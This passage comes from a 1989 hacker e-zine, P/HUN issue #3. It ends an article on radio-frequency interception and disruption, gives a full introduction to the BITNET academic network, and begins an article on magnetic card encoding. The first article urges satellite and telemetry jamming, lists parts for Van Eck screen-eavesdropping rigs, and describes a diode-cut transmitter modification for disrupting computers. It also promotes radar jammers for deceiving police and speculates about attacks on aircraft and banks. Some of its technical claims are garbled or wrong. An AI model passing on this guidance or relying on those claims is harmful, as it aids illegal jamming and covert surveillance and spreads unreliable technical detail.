  4661. transmit dish and the power behind the signal. So for a ten foot dish,
  4662. you would need 91 watts, a six foot dish, 280 watts. It may not be
  4663. dirt cheap to generate high powered signals in the mid range of 1-10
  4664. Ghz, but it does not present a great techincal obstacle and surplus
  4665. gear is so easy to obtain.
  4666.  
  4667. You don't need large dishes with great amounts of power to do this.
  4668. All that is needed is a moderate size dish, a few tens of watts at
  4669. microwave frequencies, and Bingo! You've got an effective satellite
  4670. jamming station! And then you have to address the issue of the
  4671. telemetry channel. THey may not be able to overtake the signal, but if
  4672. jam the signal with another, it may be possible to affect the
  4673. operation, stability or orbit of the target. Frequencies for such
  4674. channels are available from a number of sources and for as little as
  4675. $2.50 per frequency.
  4676.  
  4677. Now these examples and the reported stories dealing with television
  4678. stations interuption's are fast becomming one of the most feared aspect
  4679. of open air transmissions. Such transmitter frequencies are no longer the
  4680. domain of commerical radio and television stations. Transmissions on any
  4681. frequency are just a phone call away from suppliers who provide common
  4682. or business radio transmission technology.
  4683.  
  4684. So if satellite and television stations can be interupted by such
  4685. forces, six million dollar helicopters are taken down because of CB
  4686. radios, and automobiles cease to operate due to a wide spectrum of
  4687. emmited signals, then the possibility to intercept and harvest vast
  4688. amounts of knowledge is available to those who wish to gather such.
  4689.  
  4690. Now to explain such basic interceptions are now commonplace with
  4691. horrific results to those who do not believe that such things can
  4692. happen. For a simplistic view of such emmited signals, take a standard
  4693. "Walkman" type of radio and visit one of the many locations of ATM's
  4694. or better known as "money machines". (This excerise may also be performed
  4695. near any standard personal computer if such machines are not available.)
  4696. and tune through the FM band. With careful tuning, one will be able to
  4697. "hear" machine funcitions occuring. Taking basic simple electronics, one
  4698. may have the ability to recieve and reconstruct such impulses to a
  4699. readable form.
  4700.  
  4701. Or an example of larger scale and better know, would be with the use of
  4702. back-yard home satellite dishes. Dishes range from 6 to 12 feet wide.
  4703. Signals available include music, sports, news, movies, stock and
  4704. commodity trading quotes, weather, education and other such information
  4705. services. In addition to these services, a number of different multi-site
  4706. conference services are available from a host of major hotel chains as
  4707. well as privatly organized meetings held for specfic time periods and
  4708. dates. All may be tuned through the use of a dish and sensitive
  4709. information that may not be available to someone, is then made available
  4710. and no one is the wiser! Transponders are not private, and are rented out
  4711. for only the time used. And one other thing that might bring you to your
  4712. senses about such signals, is that the signals are transmitted by the
  4713. satellite over a wide area to anyone who can recieve such signals.
  4714.  
  4715. One other development is the small Micro-Sat by Norsat. This complete
  4716. system offers both satellite bands coverage, Ku and C, a small dish and
  4717. circuit board that fits inside an IBM PC. The unit downblocks 950 Mhz to
  4718. 1.45 Ghz, offers a maximum baud rate of 9600 bps, frequency, bandwidth,
  4719. video and audio selectable formats and may be connected to the
  4720. VideoCipher II, B-Mac and Oak Orion descrambling systems.
  4721.  
  4722. Some other such signal reconstruction devices are now also available
  4723. through the mails. One such device is available in plan form from
  4724. Don Britton Enterprises and is called the Re-Process Sync Amplifier.
  4725. The device was developed to recieve signals emmanated from cable
  4726. television systems. What the device does in essance, is to take a
  4727. signal that "leaks" from cable tv systems and recieves such, adds a
  4728. sync signal needed by the television set to display the recieved
  4729. signals and then sends the signal to the antenna input of the set so
  4730. that display may happen. Now if weak signal reception is available from
  4731. leaking cable systems, then the ability to recieve weak signals from
  4732. logical devices is also possible.
  4733.  
  4734.  
  4735. Interception and Weapons Possibilities
  4736. --------------------------------------
  4737.  
  4738. Think about possible interception points pertaining to logical
  4739. security methods. Communications may be encrypted, data may be stored
  4740. in an in-active form and access is only a matter of time while the
  4741. interceptee is waiting for the dispersal. The next security concerned
  4742. area covered would be for the encryption of the information in its
  4743. stored and transmitted form. The encryption is all wonderful and good
  4744. for the transmission and storage, but does nothing for the information
  4745. as it is in its final stage to the human eyes! And you only have two
  4746. ways to get it to the eyes, in hard copy or by a video screen.
  4747.  
  4748. Now you think that interception is not possible since the information is
  4749. encrypted, but the data must be decrypted so that the human connection
  4750. may use the information. The human connection allows for the reception
  4751. of said information by the afore mentioned devices and lets interception
  4752. to happen through the clear or decryption points of the attacked devices.
  4753.  
  4754. And one other point to mention; other possible effects of reception /
  4755. transmission to security in general, could affect other controls ranging
  4756. from building energy management to security access and monitoring
  4757. controls.
  4758.  
  4759. To give a better understanding of such equipment, we will discuss
  4760. some of the devices known. One such device known as the Van Eck device
  4761. and the other is called the Re-Process Sync Amplifier. Some may feel that
  4762. there are two different systems involved in this discussion, but the
  4763. author finds no major difference between the two, with the exception of
  4764. the Van Eck device is built for operation on European voltages and has a
  4765. built-in digital frequency meter. The one major difference found is with
  4766. the dates of copyrights for the two devices. The Don Britton device is
  4767. dated 1979, while the Van Eck unit is dated October,1985.
  4768.  
  4769. Note: Another unit, with plans for such devices, are available from
  4770. Consumertronics, located in Alamorgordo, New Mexico. Besides the plans
  4771. for a Van Eck type reader, one book offers information in reference
  4772. to computer crime and countermeasures, how systems are penetrated, BBS
  4773. advice, Password defeats, TEMPEST, crosstalk amplifiers and a 200 word
  4774. phreaking terms glossary. All for only $15.00
  4775.  
  4776. We will begin with a basic understanding of the inner workings of the
  4777. device. The one other major basic difference with the two reader boxes is
  4778. that the Van Eck box is designed for use with tv's and VDT's used in
  4779. Europe as compared with the Britton box built for use in the United
  4780. States. This device in general, is designed to restore and regenerate the
  4781. sync and colorburst signals and ignores all information appearing during
  4782. either the vertical or horizontal blanking. Its basic result is
  4783. reconfigure through the use of supplying artifical external signals
  4784. inputed directly to any video monitor through a simple 10-50 dollar
  4785. modification of the TV or video monitor, or in simple english, takes a
  4786. weak video signal and tries to shape or match it and then boost its
  4787. output to a normal television screen.
  4788.  
  4789. One other interesting thought comes to mind with the use of video tape
  4790. copy protection methods. Since these methods use a means that makes it
  4791. tough on the VCR not the TV from generating signals for tape duplication,
  4792. there have been a number of devices that assist in the retoring and
  4793. re-structure of the picture and sound. One device is known as the
  4794. "Line Zapper". The device helps to adjust the brightness changes, vertical
  4795. jumping and jittering, and video noise. It is available in kit or complete
  4796. form. Pricing starts at $69.95 and complete tested units cost $124.95.
  4797. Now if this unit can assist in the filtering and structuring of
  4798. commerically induced weak signals, then it should be able to take a
  4799. boosted signal presented to it and clean the picture to something of
  4800. useable form. Some may see this only as a filter for video processing
  4801. with a focal point on the actual copy-guard techniques, but such a
  4802. device incorporated into the Van Eck type of gear should assist in the
  4803. overall signal restructuring.
  4804.  
  4805. Now one other interesting point about possible video signaling
  4806. re-construction methods was addressed in a multi-part series published in
  4807. Radio-Electronics based on the methodology used for the construction of
  4808. video signals scrambeled by different vendors of cable and over-the
  4809. air pay television. The series dealt with all aspects and methods of
  4810. video and audio, (complete with discussions on the DES methods used for
  4811. the VideoCipher units and the like,) used in commerical systems in use.
  4812.  
  4813. One other thought comes to mind of an experimental nature. Since the
  4814. screen of a computer is not always changing and for the most part stable
  4815. in its display, why not take the recieved signal and digitize it!
  4816. You could filter out signal noise clean up any true video signal present.
  4817. This is no great techno-wonder, the basic gear could be put together with
  4818. Radio Shack or the like types of equipment. And the cost is still most
  4819. reasonable. If not available there, costs for home-brew gear would not be
  4820. that high. The simple electronics blocks would consist of comparators,
  4821. video detectors, data seperator gates, a to d - d to a converters,
  4822. data amp and a signal level converter.
  4823.  
  4824. Or the better version, might be a modified slow scan television system
  4825. with error correction and clean-up circuits. Such units work over normal
  4826. phone lines or standard radio channels and since the units can take
  4827. signals from these two different types of inputs, there should be no
  4828. problem in adapting the unit to accept a cleaned up analog signal from a
  4829. digitizer.
  4830.  
  4831. Away from the world of the experimental thoughts, we return to the
  4832. point at hand....
  4833.  
  4834. Now there are two types of monitors used today. The first, called
  4835. composite and the second using TTL logic to control the screen and its
  4836. pattern. The composite screen is nothing more than a television set or
  4837. Apple computer type of monitor. The construction of the picture is
  4838. performed by a beam of electrons that are scanned across the screen at a
  4839. rate of 525 lines per second. Since the majority of screens are of a
  4840. composite nature ( this is even true in most IBM environments) the
  4841. ability to recieve the signal is very possible from a radio emmission
  4842. standpoint.
  4843.  
  4844. The reception of such signals is not fairytales, but comes with reality
  4845. attached through the use of simple electronics. The first part of the
  4846. reception project is to have a method of signal acaquisition and
  4847. amplifcation. Such gathering may be performed by the use of standard
  4848. electronics store technology. For this example, we will use common
  4849. Radio Shack electronics. The reason is due too the common variety
  4850. electronics that are available to most persons needing such science to
  4851. accomplish the required gathering.
  4852.  
  4853. To start, since a base station is out of the question due to the weak
  4854. signals one would have to recieve. So the need for transportable equipment
  4855. is a must. Antenna, amplifier, sync process unit and display medium
  4856. must be powered in the transit unit. Depending on budget and (BEL)
  4857. (Basic Equipment List) requierments a fully battery operated set-up
  4858. can be constructured for under ................
  4859.  
  4860.  
  4861. Our two systems described here will be different only in basic
  4862. construction and budgetary BEL's.
  4863.  
  4864. The "Radio Shack" Reader
  4865. ------------------------
  4866. 1. The antenna could consist of a Radio Shack TV/FM # 15-1611 for 49.95
  4867.  
  4868. 2. If needed, Radio Shack in-line signal amplifier 10 db gain # 15-1117
  4869.    for 15.95
  4870.  
  4871. 3. Radio Shack RF Video Modulator # 15-1273 for 26.95
  4872.  
  4873. 4. The Britton or Van Eck unit (Cost unknown due to construction needs)
  4874.  
  4875. 5. The tuning unit may consist different available FM,TV,UHF tuners
  4876.    available for the tuning of TV Sound & Picture reception and
  4877.    possible recording. Costs for such units range from 319.95 to 119.95
  4878.    The 319.95 unit can operate on AC / DC, has audio / video input jacks
  4879.    and can operate on 9 "D" batteries. Other possible useable units would
  4880.    be # either # 16-109 or 16-111. The units cost 219.95 and the other
  4881.    159.95  Both are able to tune in the full commerical AM / FM and
  4882.    VHF/UHF Television signals, The low end of the cost spectrum would
  4883.    be the RS # 16-113 at 119.95 This unit also has the same spectrum
  4884.    tuning abilities.
  4885.  
  4886.  
  4887. The Gold Plated Unit
  4888. --------------------
  4889.  
  4890. 1. The antenna could consist of a Radio Shack TV/FM # 15-1611 for 49.95
  4891.    (Or due to the use of better reception electronics having built in
  4892.    antennas. But due to the need for amplified signals being inputed
  4893.    to the reciever we will still possibly use the RS amplified antennas.)
  4894.    a. It is also possible to use any number of amature radio antennas.
  4895.    For the purpose of maintaining a low profile, we will use one of the
  4896.    standard active recieving antennas that has a spectrum of reception
  4897.    from 50Mhz to 1 Ghz. Such units are available from mail order supply
  4898.    houses.
  4899.  
  4900. 2. If still needed, Radio Shack in-line signal amplifier 10 db gain
  4901.    # 15-1117 for 15.95 It is also possible to use # 15-1105 Indoor FM
  4902.    Signal Booster with switchable 0,10 or 20 Db gain at a cost of 24.95.
  4903.  
  4904. 3. Radio Shack RF Video Modulator # 15-1273 for 26.95
  4905.  
  4906. 4. The Britton or Van Eck unit (Cost unknown due to construction needs)
  4907.  
  4908. 5. Tuning units- The tuning units would consist of 2 seperate radio
  4909.    units. The units, both ICOM's have a combined tuning range of 100 Khz
  4910.    to 2 Ghz.
  4911.  
  4912. a. Unit 1 (R-71a) tunes from 100 Khz to 30 Mhz. This unit is nothing more
  4913.    than a shortwave reciever with excellent signal reception and frequency
  4914.    stability that offers far better overall signal interception quality.
  4915.    The unit offers 1 Hz tuning and has digital frequency readout.
  4916.    As an option, this unit may be controlled by an IBM or compatable PC.
  4917.    Cost for this unit is $949.00
  4918.  
  4919. b. Unit 2 (R7000) covers 30 Mhz to 2 Ghz. This unit is a general coverage
  4920.    reciever with excellent signal reception and frequency stability that
  4921.    offers far better overall signal tuning and interception quality.
  4922.  
  4923.    Also this unit can be computer controlled through an IBM or
  4924.    compatiable. The unit offers .01 Hz tuning and has digital frequency
  4925.    readout. Additional abilities of the unit include signal output and a
  4926.    IF output of 10.7 Mhz with other frequencies available. The cost for
  4927.    the unit is $1099.99. This particular unit also has an option for the
  4928.    output of the video signal and connection of any standard video monitor
  4929.    for 130 dollars. For an additional 160 dollars the unit can have the
  4930.    ability to recieve signals from 20 Khz and go all the way to the
  4931.    specified 2 Ghz. The unit needed is called a Kuranishi FC-7000
  4932.    frequency converter. With additional commerical television MDS tuning
  4933.    equipment, ranges can exceed 2.7 Ghz. Costs for this will range
  4934.    between 79 and 109 dollars. Since we will be mostly dealing in the
  4935.    lower ranges of frequencies, an added piece of gear may be used to gain
  4936.    the best signal reception points available. This is through the use a
  4937.    Radio Direction Finder available from American Electronics for 100
  4938.  
  4939.    dollars.
  4940.  
  4941. Now with all this equipment for both systems, another basic system
  4942. with minumum cost is readilly available to many for under 100.00
  4943. dollars. This we speak,of is the common Black & White Television set
  4944. available in mass quanties from any number of sources. It has been
  4945. reported that such interception capabilities are possible and have
  4946. occured without the interceptee knowing until the Communications
  4947. Commission have contacted the source of the emmited signals.
  4948.  
  4949. For example, some personal computers and their respective screen have
  4950. been known to been picked up on the TV screens of their neighbors and
  4951. through nothing more than rough or fine tuning the reception. The reason
  4952. is due to the TV having the ability to automatically adjust the Sync
  4953. signals to those close to the frequency of intercepted computer screens
  4954. sync frequency. This "ability" is available through the use of a common
  4955. manual type tuner on a standard Black & White set with a normal
  4956. directional antenna and an standard antenna amplifier. All three
  4957. devices in common life and attached to your own television recievers!
  4958.  
  4959. You have such devices if you have an antenna on your roof or attached
  4960. to your set. Most have attached signal amplification due to the ever
  4961. growing background noise generated by normal commerical stations and
  4962. reception charictersistic In simple term, the guy next door can read
  4963. your screen and you don't know it. Now take the number of personal type
  4964. computers in a standard corporate environment, caulculate the possible
  4965. dollar figures of the combined information contained in these machines,
  4966. and substantial sums become more evident than ever before. If business
  4967. plans, formulas or patent-trade information, client lists, or any
  4968. other type of valuable information and since that information will be
  4969. called up at any time or current work performed is wanted in the
  4970. surveillance gathering operation and then you have a completely wide open
  4971. way of monitoring the daily practices and transactional actions with
  4972. complete impunity and securty of such areas is completely unguarded due
  4973. to the lack of knowledge.
  4974.  
  4975.  
  4976. For experimental purposes, we will use very simplistic computer systems
  4977. to give an idea of what may be possible. The equipment shall be basic,
  4978. over the counter, cheap, electronic systems to gather and produce the
  4979. signals we which to collect.
  4980.  
  4981. The equipment list is as follows:
  4982.  
  4983. 1. Franklin Ace 1200 (Apple II compatiable)
  4984.  
  4985.    a. Franklin Ace Serial / Paralell Card
  4986.       (Paralell card is in use for the 2 printers.)
  4987.  
  4988.    b. Apple Super Serial Card (RS-232) for use with the communications
  4989.       modem.
  4990.  
  4991. 2. Franklin Video Monitor (40 or 80 characters display)  18 Mhz
  4992.  
  4993.    ( Standard IBM monitors radiate at 15 to 16 Mhz )
  4994.  
  4995. 3. Prometheus ProModem 1200 (External type)
  4996.  
  4997. 4. Printers
  4998.  
  4999.    a. Okidata Microline 92
  5000.  
  5001.    b. Epson MX-80
  5002.  
  5003. Our basic reception / interception equipment consists of:
  5004.  
  5005. 1. Bearcat 250 (50 Channel) Scanner
  5006.  
  5007.    (Coverage from 32-50,146-148,148-174,420-450,450-470,470-512 Mhz)
  5008.  
  5009. 2. Soundesign FM Stereo Tuner (86.5 Mhz to 109.5 Mhz)
  5010.  
  5011. 3. Electrobrand AM-FM-SW-CB-TV-PB-AIR-Weather
  5012.  
  5013.    The AM and FM are standard commerical band recievers.
  5014.  
  5015.    SW is short-wave from 4 Mhz to 12 Mhz
  5016.  
  5017.    TV coverage is from audio channels 2 through 13
  5018.  
  5019.    AIR band from 108 through 135 Mhz
  5020.  
  5021.    Public Band is 145 through 175 Mhz
  5022.  
  5023. 4. A Gould OS 1100 A Osocilliscope 25 Mhz range
  5024.  
  5025.  
  5026. Since we will not try to re-construct the actual video signal generated,
  5027. as this has already been done, we will not have to explain what we recieve
  5028. as a picture. What we will cover is the gross signal output of standard
  5029. population computerized logical systems.
  5030.  
  5031. In our observations, we have seen a wide spectrum of emmitted signals
  5032. with a strong signal between 9.0 and 9.250 Mhz for the display of
  5033. standard text scrolling by. Better signal display was found at the
  5034. lower frequencies of 9 Mhz. Monitor frequencies were found in the area
  5035. of 11 through 19.5 - 20 Mhz. Printer frequencies are in the range of
  5036. 140 to 200 Mhz. Disk operations were detected in the ranges of 88 to
  5037. 250 Mhz. Overall frequency generation was from 4 through 500 Mhz.
  5038. The modem was found between 28 and 300 Mhz. All in all, this easy
  5039. discovery of radiated or transmitted signals by means of common radio
  5040. technology could lead to.
  5041.  
  5042. An interesting thought comes up with the use of some common ham
  5043. transcievers for such operations, and with simple, easy modifications,
  5044. some can transmit on all frequencies from 1.6 t 30 Mhz. Such a transmitter
  5045. would be the Kenwood 440. This transciever offers 100 watt output and as
  5046. stated all frequency transmit. To perform the small modification, all one
  5047. would have to do is cut one lead to a diode (Diode D 80) and as an added
  5048. bonus for better frequency  readout, you gain an additional readout of
  5049. 10 Hz by snipping the lead to Diode 66. So the unit covers the range of
  5050. IBM PC frequencys in use and all of the Apple systems too. Thats says it
  5051. all! It can offer the possibility for disruption of internal signals used
  5052. to process information and the possibility of causing other logic related
  5053. systems to act or not without reason.
  5054.  
  5055. For example, would it be possible for the Soviets to sit under cover with
  5056. a modified Kenwood 440 100 watt radio or better yet, a Radio Shack 40
  5057. channel AM / SSB and a 100 watt Firebird linear amplifier and a simple
  5058. small antenna to disperse the signal. So the problem of the 6 million
  5059. dollar helicopter comes down to a wholesale cost of 150.00 ( 190.00 to
  5060. 200.00 for an average rip-stop nylon camping backpack unit ) per man with
  5061. a recommended dispersal of 3 manpacks per unit into the theater.
  5062. Suspected effective ranging up to 3 miles per man pack unit is suggested.
  5063.  
  5064. Or even better, if such things were possible against military aircraft
  5065. or normal commerical real world autos, then directed intent should be
  5066. of now problem against civilian targets such as computer installations,
  5067. bank and operations support structures, possible override of security
  5068. systems and any other systems that may be affected by such forces.
  5069.  
  5070.  
  5071. Other uses of directed energy may be used in law enforcement situations
  5072. for the apperhension of suspected persons in late model automobiles.
  5073. If the truckers are using the radios for game playing, then why can't the
  5074. police have the same type of device for the stopping of autos? There are a
  5075. number of devices that will radiate such energies over the spectrum.
  5076. One such device would be the Radar Speed Gun Calibrator (or better know as
  5077. a radar jammer) for use with calibration of speed guns or for the
  5078. deceiving of police radar units. The plans for such units were (are)
  5079. available for a number of sources. One such source, is Philips Instrument
  5080. Company or another such source was the Radio-Electronics issue in the
  5081. spring or summer of 1987 with plans for the Radar Speed Gun Calibrator,
  5082. that would allow you to transmit a signal that would equal the same type
  5083. of reflected signal from an automobile traveling at the supposed testing
  5084. speed. Range's of speed signal output would equal 5 mph to well over
  5085. 100 mph.
  5086.  
  5087. Some plans or kits come with instructions for the combination of radar
  5088. jammer units with most commonly available auto radar detector units.
  5089. In simple terms, the radar detector unit detects a signal and through
  5090. its display or attention getting circuitry in turn activates the radar
  5091. jamming equipment to deceive or jam the police transmitter / reciever
  5092. units. Best know of such combinations, were the use of Escort radar
  5093. detectors and jammer units with transmission horns mounted behind the
  5094. front grill of autos. No ifs, ands, or buts, they work!
  5095.  
  5096. One other piece of equipment that may have devastating effects on overall
  5097. security and support systems, deals with the generation of very high
  5098. energy pulses that might be classified as being able to generate EMP's
  5099. that could damage almost any piece of electronic gear. The claim from the
  5100. designer is that this device can generate a pulse with an effective range
  5101. of multi-millions of watts. The device on average will produce a pulse
  5102. equal to 400,00 wats in a testing mode with the multi-million outputs
  5103. available with full charging of the capacitor banks peaked. Also stated in
  5104. this book is the ability of the unit to produce a very large inductance in
  5105. near by electronic gear. Most interesting! And the only statement in this
  5106. book about the device and it's short comming, has to deal with the
  5107. in-ability of the device to produce sufficent output used in certain
  5108. nuclear experiments. I wonder what that means?
  5109.  
  5110. So, in closing, the capability of these units is well within the range of
  5111. any person with the intent comes closer to home than ever before.
  5112. The equipment is nothing of major technical wonderment, just a few simple
  5113. block circuits put together to each other so that they work together to do
  5114. the final requested product. And all of the described gear or plans may be
  5115. in the hands of everyday persons even if they don't know it! And while
  5116. most do not have such knowledge about how such systems may be used to
  5117. corrupt other systems, or even how the average telephone or toaster may
  5118. work, they will still state that such described technology is not
  5119. possible, and open the door to major disaster due to complete ignorance to
  5120. the problem. In closing, to steal a phrase from someone
  5121. else, "The truth shall set you free (or may keep you from being over
  5122. exposed from free form energy)!
  5123.  
  5124.  
  5125. "Click!"  And the last words spoken by the corporate DP offical were...
  5126.  
  5127. " Thats impossible! You could never do that to my operation!"
  5128.  
  5129. Ahem, Sure sir, Sure!
  5130.  
  5131. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5132. =                   P/HUN Issue #3, Volume 2: Phile #9 of 11                  =
  5133. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5134.  
  5135.                           An introduction to BITNET
  5136.                           -------------------------
  5137.  
  5138.                                By Aristotle
  5139.                               Jan 17, 1989
  5140.  
  5141.  
  5142.          About BITNET:
  5143.  
  5144.               Because It's Time NET (BITNET) is the largest of the
  5145.          acedemic computer networks and one of the largest mainframe
  5146.          networks.  BITNET connects hundreds of thousands of students
  5147.          and professors in Asia, Europe, Middle East, and North
  5148.          America.  In 1988, BITNET had nearly 2000 computer systems at
  5149.          higher institutions connected to it.  BITNET may not allow
  5150.          you to log onto mainframes, BUT it IS an invaluable source of
  5151.          information.  While on BITNET, you can access certain
  5152.          services such as chat relays, file servers, electronic mail
  5153.          service, and info servers. (See below for more info)
  5154.  
  5155.  
  5156.          A little semi-technical info:
  5157.               The mainframes on BITNET are connected via constantly
  5158.          operating telephone lines or satellite links.  Unlike
  5159.          packet-switching networks (ie. Telenet), BITNET is a store
  5160.          and forward network.  That means that if you send a message
  5161.          from Florida to Kentucky, the computers in the network
  5162.          between Florida and Kentucky will store and forward it from
  5163.          each computer to computer until it reaches Kentucky.
  5164.  
  5165.  
  5166.               In BITNET there's only one path from Kentucky to
  5167.          Florida.  Each computer is called a NODE.  Below is an
  5168.          illustration of how a small section of the network would look
  5169.          like.
  5170.  
  5171.  
  5172.  
  5173.              A----B----C
  5174.              |    |    |
  5175.              D----E----F----G
  5176.              |         |    |
  5177.              H         I----J ---K
  5178.  
  5179.  
  5180.          Example A.
  5181.          A message traveling from A to H would travel the following
  5182.          path:
  5183.          A-D-H
  5184.  
  5185.          Example B.
  5186.          A message traveling from A to F could travel one of two ways.
  5187.          These are:
  5188.          A-B-C-F  or A-D-E-F
  5189.  
  5190.               Sometimes when a node is down, the message may be
  5191.          delayed or routed through different nodes as in example B.
  5192.  
  5193.  
  5194.               The time to transfer messages can vary from just a few
  5195.          seconds to an hour.  This cause for this is usually one (or
  5196.          both) of two reasons.  The first factor is the size of the
  5197.          message.  Larger amounts of data take longer times to
  5198.          transmit.  The second factor is the status of the network.
  5199.          As we all know, computers are prone to breaking down.
  5200.          Messages that cannot be routed past the downed node are
  5201.          stored in the net until there is a clear path to it's
  5202.          destination.
  5203.  
  5204.  
  5205.          Addresses:
  5206.  
  5207.               Each of the mainframes(NODE) on BITNET has it's own
  5208.          individual address.  The addresses are usually an
  5209.          abbreviation of the name of the institution that supports the
  5210.          mainframe.  One example is the University of Massachusettes
  5211.          "UMASS".
  5212.  
  5213.  
  5214.               The indiviuals that have access to BITNET also have
  5215.          their own addresses.  These addresses are assigned to the
  5216.          user when he/she first sends information over BITNET.  The
  5217.          entire address for a user is set up as follows:
  5218.  
  5219.  
  5220.  
  5221.          University of Kentucky Prime--+
  5222.                                        |
  5223.          @ (AT)----------------------+ |
  5224.                                      | |
  5225.          User ID-------------------+ | |
  5226.                                    | | |
  5227.                                    | | |
  5228.                                    | | |
  5229.                                    | | |
  5230.                                    | | |
  5231.                                  $108@UKPR
  5232.  
  5233.          Note: Not all addresses give indication of the type of
  5234.          system.
  5235.                Also: On some machines, the BITNET ID will be different
  5236.          from the system ID.  Ex. CS.DEPT.SMITH.J@UKPR is also
  5237.          $108@UKPR.
  5238.  
  5239.  
  5240.  
  5241.          Access:
  5242.  
  5243.               It is IMPOSSIBLE to access BITNET unless you can gain
  5244.          access to one of the nodes.  That means, there are NO
  5245.          dial-ups that do not go through a mainframe.  BITNET is
  5246.          supported by the institutions that have access to it and it
  5247.          is your right as a student to have access.  It is NOT your
  5248.          right to access the mainframe though.  A good way to gain
  5249.          access to BITNET is to go to your local university and ask or
  5250.          engineer an account for the use of BITNET.
  5251.  
  5252.  
  5253.  
  5254.          Uses:
  5255.  
  5256.               There are three basic methods of communicating via
  5257.          BITNET: mail, message, and file.  Each method has it's own
  5258.          advantages and disadvantages.
  5259.  
  5260.  
  5261.               The interactive message (Let's just call it a message)
  5262.          is the fastest and most convenient method of transitting
  5263.          short amounts of information over BITNET.  Messages are
  5264.          composed of one line of information that is sent VERY quickly
  5265.          to it's destination.  You would use the message when chatting
  5266.          with someone at a different node.  The bad part about
  5267.          messages is that if a node is down, your message is lost.
  5268.          You WILL recieve an error message though.
  5269.  
  5270.               Messages are usually sent via the TELL and SEND
  5271.          commands.  Below are examples of the syntax for sending a
  5272.          message on the VM/CMS and Prime systems:
  5273.  
  5274.  
  5275.          TELL userid@node message
  5276.  
  5277.          or
  5278.  
  5279.          TELL 151133@DOLUNI1 Hey Terra, How are the guys at CCC
  5280.          doing?
  5281.  
  5282.  
  5283.          Mail:
  5284.  
  5285.               Electronic mail is the most versatile method of
  5286.          communication on BITNET.  Unlike the message, a letter will
  5287.          be stored if a node is down.  A letter can be from one word
  5288.          of text to however long you want it.  It has been suggested
  5289.          to me to NOT transmit any mail over 3000 lines long (hmmm,
  5290.          maybe we should explore that one.)  The actual file that is
  5291.          transmitted is really nothing more than a formatted text file
  5292.          with a header.  When you send mail from you system,  You will
  5293.          be prompted to input a subject so the header can include the
  5294.          sending address, recieving address, date, and subject.  A
  5295.          piece of mail would look like this:
  5296.  
  5297.  
  5298.          Date:  Fri, 13 Jan 89 18:26:12 EDT
  5299.          From:  Terra <151133@DOLUNI1>
  5300.          Subject:  Greetings
  5301.          To:   $108@UKPR
  5302.          +
  5303.          =============================================================
  5304.          +  Hello Aristotle
  5305.          |
  5306.          |  Regarding the information that I have been recieving
  5307.          |  directed to a member of the
  5308.          |  Chaos Computer Club.......
  5309.  
  5310.                                         rest of text
  5311.  
  5312.  
  5313.  
  5314.  
  5315.  
  5316.          Files:
  5317.  
  5318.               The file is the best way to send large amounts of
  5319.          information over BITNET.  As with mail, files are stored
  5320.          until you read them or in the case of node being down, until
  5321.          they are back up.  Any type of file can be sent via a file.
  5322.          They can be either text or binary.  On a VM/CMS system, one
  5323.          would use the SHIP command to send a file over BITNET.  Below
  5324.          is an example:
  5325.  
  5326.  
  5327.          SHIP filename filetype userid@node
  5328.  
  5329.          or
  5330.  
  5331.          SHIP phun3 txt $108@UKPR
  5332.  
  5333.          I suggest that you check your online help for information on
  5334.          sending info over BITNET.
  5335.  
  5336.          Now for the phun part....
  5337.  
  5338.          FILE SERVERS, CHAT RELAYS, AND SERVICES:
  5339.  
  5340.               Servers are machines set up as automated databases for
  5341.          the distribution of various information.  Servers respond to
  5342.          commands via mail or message.  Not all use accept this type
  5343.          of communication.  It all depends on the type of software the
  5344.          server is running.  One would send a message to a server in
  5345.          the following syntax:
  5346.  
  5347.  
  5348.          TELL userid@node command
  5349.  
  5350.          or
  5351.  
  5352.          Tell listserve@bitnic help
  5353.  
  5354.               File servers are like servers but they are set up as
  5355.          databases that transmit files.  They are kinda like BBS's.
  5356.          The best way to get started with a file server is to send it
  5357.          the help command.
  5358.  
  5359.  
  5360.          A good place to start is the Listserv@Bitnic system.  It
  5361.          will send you all the information you will need to get
  5362.          started.
  5363.  
  5364.               Name servers have two functions.  The first is to locate a
  5365.          person's address on BITNET and the second is to help you find
  5366.          people on BITNET with similar interests.  (Hmmm, a hacker
  5367.          directory?)
  5368.  
  5369.          I suggest starting with the name server at Drew University.
  5370.  
  5371.          To find a particular person, just send the following to
  5372.          Drew:
  5373.  
  5374.          TELL NAMESERV@DREW SEARCH/NAME john doe
  5375.  
  5376.          If the person you are looking for is not registered, you will
  5377.          recieve a message informing you of that.
  5378.  
  5379.          To register yourself, send the following to Drew:
  5380.  
  5381.          TELL NAMESERV@DREW REGISTER first last interests
  5382.  
  5383.          or
  5384.  
  5385.          TELL NAMESERV@DREW REGISTER John Doe LMOS hacking
  5386.  
  5387.  
  5388.               A chat relay is set up to allow many users to chat with
  5389.          each other without having everyone sending messages to each
  5390.          other individually.  When on a relay, the people on your
  5391.          channel (be it public or private) will all see the messages
  5392.          that you send to them.  This is GREAT for phreaker
  5393.          conferences (Though it is NOT secure due to system operators)
  5394.          and just chatting with your friends over LONG distances.
  5395.          Geee and it is all legal too!  To find out more about relays,
  5396.          just send the following:
  5397.  
  5398.  
  5399.          TELL RELAY@UTCVM help
  5400.  
  5401.          If your local relay is not UTCVM, you will receive a message
  5402.          tell you that and also your correct relay.
  5403.  
  5404.  
  5405.  
  5406.               Well, that's it for this file. If you have any questions
  5407.          about BITNET, you can contact me at the following boards:
  5408.  
  5409.  
  5410.          Hacker's Den       718-358-9209
  5411.          The Outlet Private 313-261-6141 Newuser/Kenwood
  5412.  
  5413.  
  5414. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5415. =                 P/HUN Issue #3, Volume 2: Phile #10 of 11                   =
  5416. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5417.  
  5418.                 PLASTIC CARD ENCODING PRACTICES AND STANDARDS
  5419.                 ---------------------------------------------
  5420.                                 By Hasan Ali
  5421.                              For P/HUN Issue #3
  5422.  
  5423.  
  5424.                    GENERAL PHYSICAL CHARACTERISTICS
  5425.                    --------------------------------
  5426.  
  5427. If you take any plastic card (MasterCard, VISA, AMEX, ATM cards, etc.) and
  5428. turn it over you will find a thin black strip of magnetic material.  This
